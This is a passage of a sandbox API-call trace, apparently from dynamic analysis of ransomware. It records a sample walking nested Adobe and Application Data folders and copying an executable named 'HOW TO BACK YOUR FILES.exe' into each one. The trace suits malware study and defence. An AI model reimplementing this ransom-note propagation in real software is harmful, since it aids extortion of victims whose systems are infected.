FILES.exe") returned -1 [0091.569] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.569] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.569] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.569] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.569] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.569] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0091.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0091.569] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 143 [0091.569] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.569] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.570] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.570] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.570] GetLastError () returned 0x0 [0091.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.570] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.570] CloseHandle (hObject=0x120) returned 1 [0091.570] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.570] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.571] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.571] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.571] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.571] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0091.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0091.571] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned 147 [0091.571] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.571] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.571] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.572] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.572] GetLastError () returned 0x0 [0091.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.572] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.572] CloseHandle (hObject=0x120) returned 1 [0091.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.572] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.572] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.572] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.572] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.572] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0091.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0091.573] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned 161 [0091.573] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.573] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.573] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.573] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.573] GetLastError () returned 0x0 [0091.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.574] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.574] CloseHandle (hObject=0x120) returned 1 [0091.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.574] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.574] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.574] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.574] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.574] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0091.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0091.574] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 151 [0091.574] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.574] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.574] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.575] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.575] GetLastError () returned 0x0 [0091.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.575] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.575] CloseHandle (hObject=0x120) returned 1 [0091.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.575] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.575] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.575] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.575] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.576] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0091.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0091.576] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 156 [0091.576] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.576] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.576] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.576] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.577] GetLastError () returned 0x0 [0091.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.577] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.577] CloseHandle (hObject=0x120) returned 1 [0091.577] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.577] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.577] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.577] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.577] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.577] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.577] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0091.577] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0091.577] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned 166 [0091.577] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.577] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.577] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.578] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.578] GetLastError () returned 0x0 [0091.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.578] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.578] CloseHandle (hObject=0x120) returned 1 [0091.578] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.578] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.578] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.579] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.579] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.579] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.579] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0091.579] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0091.579] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 175 [0091.579] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.579] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.579] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.580] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.580] GetLastError () returned 0x0 [0091.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.580] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.580] CloseHandle (hObject=0x120) returned 1 [0091.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.580] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.580] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application 